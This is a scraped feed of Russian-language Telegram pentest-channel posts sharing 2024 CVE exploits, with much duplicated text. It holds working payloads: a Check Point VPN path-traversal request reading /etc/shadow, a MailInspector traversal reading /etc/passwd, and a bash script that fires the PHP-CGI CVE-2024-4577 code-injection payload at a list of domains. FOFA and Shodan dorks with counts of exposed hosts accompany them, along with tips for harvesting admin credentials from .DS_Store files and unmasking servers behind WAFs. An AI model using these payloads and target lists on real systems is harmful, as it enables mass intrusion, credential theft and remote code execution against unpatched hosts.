Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
#0day #checkpoint
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#0day #checkpoint
🔥2
Forwarded from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда
*
fofa link (610,604 хостов)
#php #xamp
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда
PHP-CGI
работает на платформе Windows
и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823
. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.*
fofa link (610,604 хостов)
#php #xamp
🔥1
Forwarded from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
*
Сохраняйте скрипт и по списку доменов:
#php #xamp
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)
if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}
# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi
# Call the main function with the domain list file
main "$1"
*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_script.sh /path/to/domains-list
#php #xamp
🔥1
Forwarded from Proxy Bar
CVE-2024-34470 HSC MailInspector
*
POC:
FOFA:
*
POC:
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd
FOFA:
title=="..:: HSC MailInspector ::.."
🚨 Новая статья о RCE через Dependency Confusion!
Атаки на цепочку поставок, такие как "Dependency Confusion", становятся всё более изощрёнными. Злоумышленники создают пакеты с именами, идентичными приватным пакетам компаний, и загружают их в публичные репозитории. Система сборки скачивает эти вредоносные пакеты, что может привести к удалённому выполнению кода (RCE).
Примеры влзможных защитных мер включают в себя цифровые подписи пакетов, мониторинг зависимостей и тестирование в изолированных средах. Комплексный подход и регулярный аудит критически важны для безопасности.
📖 Узнайте больше и защитите свои проекты
Атаки на цепочку поставок, такие как "Dependency Confusion", становятся всё более изощрёнными. Злоумышленники создают пакеты с именами, идентичными приватным пакетам компаний, и загружают их в публичные репозитории. Система сборки скачивает эти вредоносные пакеты, что может привести к удалённому выполнению кода (RCE).
Примеры влзможных защитных мер включают в себя цифровые подписи пакетов, мониторинг зависимостей и тестирование в изолированных средах. Комплексный подход и регулярный аудит критически важны для безопасности.
📖 Узнайте больше и защитите свои проекты
Telegraph
RCE via Dependency Confusion
Авторы: ExZuperi FaLLenSkiLL Введение Атаки на цепочку поставок программного обеспечения становятся всё более изощрёнными, и одним из самых коварных видов таких атак является атака «Dependency Confusion» (конфузия или запутывание зависимостей). В этом контексте…
🔥4
🔥 Нашли файл .DS_Store? Не игнорируйте! Это может быть потенциальный вектор атаки.
Что это такое? 🤔
Файл .DS_Store (Desktop Services Store) — это скрытый файл, который macOS создает в каждой директории для хранения информации о настройках отображения. По умолчанию эти файлы скрыты, поэтому невнимательные администраторы могут их пропустить и оставить в общедоступных директориях веб-сервера.
Почему это полезно? 🛠
Файл .DS_Store хранит информацию о структуре директорий. Разобрав этот файл, можно получить список всех файлов и папок в данной директории. Это особенно полезно, если названия файлов генерируются случайно и их нельзя сбрутить.
Реальный кейс 🚀
📌 При обычном сканировании директорий в корне сайта был найден .DS_Store. С помощью утилиты Python-dsstore можно было посмотреть файловое окружение, таким образом была восстановлена структура сайта. Меня заинтересовала директория files, в которой, о чудо оказался еще один .DS_Store, который раскрывал все файлы и директории рядом (см. фото). В том числе и те, которые пользователь явно не должен был видеть.
📌 Пробежав по директориям и изучив все файлы, удалось получить учетные данные от админки сайта.
💡 Для автоматизации поиска и анализа файлов .DS_Store можно использовать Python-скрипты и такие инструменты как ds_store_extractor. Это поможет сэкономить время и быстро получить структуру директорий.
Что это такое? 🤔
Файл .DS_Store (Desktop Services Store) — это скрытый файл, который macOS создает в каждой директории для хранения информации о настройках отображения. По умолчанию эти файлы скрыты, поэтому невнимательные администраторы могут их пропустить и оставить в общедоступных директориях веб-сервера.
Почему это полезно? 🛠
Файл .DS_Store хранит информацию о структуре директорий. Разобрав этот файл, можно получить список всех файлов и папок в данной директории. Это особенно полезно, если названия файлов генерируются случайно и их нельзя сбрутить.
Реальный кейс 🚀
📌 При обычном сканировании директорий в корне сайта был найден .DS_Store. С помощью утилиты Python-dsstore можно было посмотреть файловое окружение, таким образом была восстановлена структура сайта. Меня заинтересовала директория files, в которой, о чудо оказался еще один .DS_Store, который раскрывал все файлы и директории рядом (см. фото). В том числе и те, которые пользователь явно не должен был видеть.
📌 Пробежав по директориям и изучив все файлы, удалось получить учетные данные от админки сайта.
💡 Для автоматизации поиска и анализа файлов .DS_Store можно использовать Python-скрипты и такие инструменты как ds_store_extractor. Это поможет сэкономить время и быстро получить структуру директорий.
❤2👍2
CVE-2024-33113 D-LINK DIR-845L information disclosure
Уязвимость раскрытия информации в D-LINK DIR-845L через файл bsc_sms_inbox.php.
Exploit
*
FOFA: 496 results
*
#dlink #cve
Уязвимость раскрытия информации в D-LINK DIR-845L через файл bsc_sms_inbox.php.
Exploit
*
FOFA: 496 results
*
#dlink #cve
🔥2
CVE-2024-33111
D-LINK DIR-845L XSS
Маршрутизаторы D-Link DIR-845L версии 1.01KRb03 и ниже уязвимы для межсайтового скриптинга (XSS) через эндпоинт /htdocs/webinc/js/bsc_sms_inbox.php
Exploit
FOFA: 496 results
Shodan: 33 results
Censys: 42 results
#dlink #cve #xss
D-LINK DIR-845L XSS
Маршрутизаторы D-Link DIR-845L версии 1.01KRb03 и ниже уязвимы для межсайтового скриптинга (XSS) через эндпоинт /htdocs/webinc/js/bsc_sms_inbox.php
Exploit
FOFA: 496 results
Shodan: 33 results
Censys: 42 results
#dlink #cve #xss
🔥2
Для удобства, решил сделать свой телеграм канал, куда будут публиковаться все новые PoC с github.
https://t.iss.one/github_exploits
https://t.iss.one/github_exploits
👍3
Forwarded from Exploits from Github
GitHub
GitHub - FaLLenSKiLL1/CVE-2024-22853: D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks…
D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session. - FaLLenSKiLL1/CVE-2024-...
🌚3
cve-2024-6387-poc.zip
21.1 KB
CVE-2024-6387 with PoC
Обнаружена критическая уязвимость в сервере OpenSSH (sshd), в версиях с 8.5p1 по 9.8p1, затрагивающая Linux-системы на базе glibc. CVE-2024-6387, связана с race condition обработчиков сигналов SIGALRM, которая может привести к удаленному выполнению кода от имени root из-за использования функций async-signal-unsafe.
Почитать подробнее можно скачав PoC
Обнаружена критическая уязвимость в сервере OpenSSH (sshd), в версиях с 8.5p1 по 9.8p1, затрагивающая Linux-системы на базе glibc. CVE-2024-6387, связана с race condition обработчиков сигналов SIGALRM, которая может привести к удаленному выполнению кода от имени root из-за использования функций async-signal-unsafe.
Почитать подробнее можно скачав PoC
🔥3👍1
BI.ZONE Bug Bounty обновили свою платформу, выглядит очень симпатично)
Что нового:
🔵 Изменили стилевое и цветовое оформление. Визуальная часть стала более атмосферной и тематической.
🔵 Внедрили систему тегов. Теперь легко отфильтровать программы по нужным критериям. Например, кто отвечает за триаж — компания или наши эксперты, можно ли перевести выплату на благотворительность.
🔵 Добавили метрику для программы. Появилась возможность посмотреть среднее время обработки отчета в рамках каждой программы. Учитывается период с момента отправки репорта до получения информации о его финальном статусе.
Подробнее можно почитать тут:
https://t.iss.one/bizone_bb/265
Что нового:
Подробнее можно почитать тут:
https://t.iss.one/bizone_bb/265
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Казалось бы, описание новой критической RCE-уязвимости в Битриксе (CVSS 9.5) появилось относительно недавно, а хакеры уже все сломали.
Половина всех VMBitrix, которые видны в поисковых системах на данный момент либо мертвы, либо взломаны.
FOFA - 218 results
BDU:2024-05252
Половина всех VMBitrix, которые видны в поисковых системах на данный момент либо мертвы, либо взломаны.
FOFA - 218 results
BDU:2024-05252
CVE-2022-29268
🔥3
Forwarded from Райтапы по CTF{2025}
Я наконец-то добил это
Не могу сказать, что тут можно увидеть что-то особенно. Все результаты были получены методом научного тыка
📹 Видео:
https://youtu.be/h3_Caxe1-ak
(смотреть можно в вертикальном через телефон, так удобнее)
👮♂️ Текст:
https://humorous-hyacinth-1fc.notion.site/Pentest-of-the-Aeroflot-multimedia-system-in-the-Airbus-A321-ff48b85493144068907fb91a127443d9
Не могу сказать, что тут можно увидеть что-то особенно. Все результаты были получены методом научного тыка
https://youtu.be/h3_Caxe1-ak
(смотреть можно в вертикальном через телефон, так удобнее)
https://humorous-hyacinth-1fc.notion.site/Pentest-of-the-Aeroflot-multimedia-system-in-the-Airbus-A321-ff48b85493144068907fb91a127443d9
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Pentest of the Aeroflot multimedia system in the Airbus A321 (RUS)
Проверка в учебных целях мультимедийной системы авиакомпании Аэрофлот от автора канала writeup_ctf в ТГ
Внимание, есть видео, где голос обработан безумным искусственным интеллектом не определенной национальности и языка, который решил, что он лингвист
h…
Внимание, есть видео, где голос обработан безумным искусственным интеллектом не определенной национальности и языка, который решил, что он лингвист
h…
👍4
При проведении пентеста важно понимать, какие домены принадлежат целевой организации. Собранная информация позволяет составить более полное представление о возможных точках входа и слабых местах.
Для этого я использую сервис Backorder
Он полезен для поиска всех доменов, связанных с определенной организацией. Особенно ценно, когда нужно понять всю доменную структуру компании.
1. Вводим доменное имя, например, "ya.ru".
2. Нажимаем на значение поля "Org".
3. Ставим галочку "Все домены".
В качестве альтернативы можно использовать https://viewdns.info/reversewhois/ (а лучше исполоьзовать оба, для получения более полной информации)
Для этого я использую сервис Backorder
Он полезен для поиска всех доменов, связанных с определенной организацией. Особенно ценно, когда нужно понять всю доменную структуру компании.
1. Вводим доменное имя, например, "ya.ru".
2. Нажимаем на значение поля "Org".
3. Ставим галочку "Все домены".
В качестве альтернативы можно использовать https://viewdns.info/reversewhois/ (а лучше исполоьзовать оба, для получения более полной информации)
👍3❤1
Иногда в процессе пентеста необходимо определить реальный IP-адрес сайта, который скрыт за Web Application Firewall (WAF) или другими защитными механизмами.
Один из лайфхаков, про который часто забывают, это просто получить письмо
Правда для этого потребуется сначала поискать функционал отправки писем. Это может быть подтверждение регистрации, уведомление о сбросе пароля, подписка на рекламную рассылку и т.д. не важно. Главное получить письмо
После получения нажимаем "Показать оригинал", после чего можно посмотреть IP адрес отправителя
Один из лайфхаков, про который часто забывают, это просто получить письмо
Правда для этого потребуется сначала поискать функционал отправки писем. Это может быть подтверждение регистрации, уведомление о сбросе пароля, подписка на рекламную рассылку и т.д. не важно. Главное получить письмо
После получения нажимаем "Показать оригинал", после чего можно посмотреть IP адрес отправителя
🔥3❤🔥2👍1